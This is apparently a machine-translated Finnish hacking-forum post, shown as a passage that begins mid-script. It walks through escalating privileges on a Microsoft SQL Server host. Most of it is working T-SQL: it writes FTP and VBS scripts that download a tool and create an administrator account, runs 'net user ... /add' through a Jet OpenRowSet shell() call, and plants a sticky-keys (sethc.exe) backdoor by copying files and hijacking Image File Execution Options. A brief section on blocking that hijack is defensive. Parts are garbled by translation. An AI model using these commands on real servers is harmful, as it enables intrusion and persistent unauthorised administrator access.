exec @ret = sp_oamethod @f, 'writeline', NULL, 'get en.exe (ei nettoeskalaatioskriptiä) c:\en.exe'
exec @ret = sp_oamethod @f, 'writeline', NULL,'bye'
Kun kyselyanalysaattori on onnistuneesti suoritettu, C-asemalle ilmestyy 1.bat (jos suoritus onnistuu, mutta C-asemaa ei ole, voit muuttaa kansion kirjoittamaan, koska minkä palvelimen C-aseman juurihakemisto estää kirjoittamisen)
Sitten cmd suorittaa ftp -s:c:\1.bat
Kun tämä on suoritettu, lataat ei-net-eskalaatioskriptin CFT-asemalle FTP:lle tai kirjoitat suoraan VBS-eskalaatioskriptin
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scrip remove ting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set o=CreateObject( "Shell.Users" )'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Aseta z=o.create('user')'
exec @ret = sp_oamethod @f, 'writeline', NULL,'z.changePassword "password","'
exec @ret = sp_oamethod @f, 'writeline', NULL,'z.setting("AccountType")=3'
Sitten cmd suorittaa cscripin poistaakseen t c:\1.vbs
4. Edellinen korjataan suorittamaan komentokäskyjä, mutta korjausten jälkeen ilmenee uusia ongelmia
(1) Viesti: Virhe tapahtui xp_cmdshell:n suorittamisen aikana. Kutsu 'CreateProcess' epäonnistui virhekoodilla: '5'.
Virhe 5 on järjestelmän aiheuttama virhenumero, CreateProcess tarkoittaa säikeen luomista; tämä virheiden generointi liittyy paljon järjestelmätiedostojen cmd.exe: yksi on cmd:n poistaminen ja toinen on, että cmd:n käyttöoikeus pienenee.
SQL terminaaliporttien ja avoimen tilan tarkistamiseen:
Toimitusjohtaja.. xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'
Okei, keskeinen kohta alla on käyttää kahta SQL-käskyä kopioida järjestelmän resurssienhallintatiedosto järjestelmän shift-backdoor-tiedostoon, ja seuraavat kaksi lausetta suoritetaan erikseen.
Tämä lausunto kopioi explorer.exe muodossa sethc.exe
deklarare @o int exec sp_oacreate 'scripremove ting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe','c:\windows\system32\sethc.exe';
Tämä lause kopioi sethc.exe dllcache-hakemistoon.
Declare @oo int exec sp_oacreate 'scrip remove ting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe','c:\windows\system32\dllcache\ sethc.exe';
Kaksi muuta lausetta käyttävät sp_oacreate tallennettuja menettelyjä, jotka odsole70.dll tiedostoa täytyy käyttää, joten tämän tiedoston säilyminen liittyy sen luomisen onnistumiseen.
(2), xpsql.cpp: Virhe 5 CreateProcessista (rivi 737)
Tämä tilanne on hankalampi, ja siitä sanotaan internetissä
EXECUTIVE master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0
Valitse * OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("verkkokäyttäjä 123 123 /add")');
Valitse * OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators 123 /add")');
Tarkistin hiekkalaatikon nostaakseni tämän asian oikeudet, mutta käytäntöni mukaan onnistumisprosentti on hyvin alhainen, koska useimmat palvelimet ovat poistaneet c:\windows\system32\ias\ias.mdb. Sitten voit kokeilla kuvakaappausta sethc:tä, tietenkin kuvakaappaus on myös ehdollista, 1 xp_regwrite tämän tallennetun menettelyn 2 on 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe', Debugger' ei ole poistettu
Voit ensin kysyä, onko rekisterin kiinnitetty avain kaapattu
Toimitusjohtaja.. xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'
Jos kehote ei löydä ongelmaa, todistus poistetaan, eikä sql-komentoa voi suorittaa, jos sitä pyydetään, sethc.exe suorittaa sql-komentoa
EXEC-mestari.. xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc. EXE',
@value_name='Debugger',
@type='REG_SZ',
@value='C:\WINDOWS\explorer.exe'
Kun olen yhdistänyt terminaaliin viisi kertaa ja vaihtanut sitä, se menee suoraan työpöydälle ja lisää sen manuaalisesti.
Rekisteri muuttaa terminaaliporttia
[HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ Wds \ rdpwd \ Tds \ tcp]
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ WinStations \ RDP-Tcp,
Kuvien kaappauksen ehkäisyssä se saavutetaan pääasiassa seuraavin menetelmin:
★ Lupien rajoituslaki
Jos käyttäjällä ei enää ole pääsyä rekisteriavaimeen, se ei voi muokata näitä asioita. Avaa rekisterieditori ja mene HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options, valitse tämä kohde, napsauta hiiren oikealla - > oikeudet - > edistyneitä ja alenna ylläpitäjän ja järjestelmän käyttäjien oikeuksia (tässä sinun tarvitsee vain peruuttaa kirjoitustoiminto).
★ Nopea veitsileikkaus sotkuisen hamppumenetelmän
Avaa rekisterieditori ja siirry palkkiin
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
Ongelma voidaan ratkaista poistamalla suoraan Image File Execution Options -kohdan.
SQL-komento kaappaa rekisterin kiinnitetyn avaimen asennuksen takaoven
xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe',
'Debugger','REG_SZ','C:\WINDOWS\system32\kdsn.exe'
Ohjelmiston lataus:Turistit, jos haluatte nähdä tämän postauksen piilotetun sisällön, olkaa hyvä Vastaus
|
Julkaistu 18.3.2015 10.36.56
|
|
|
|
Julkaistu 19.3.2015 20.26.09
|
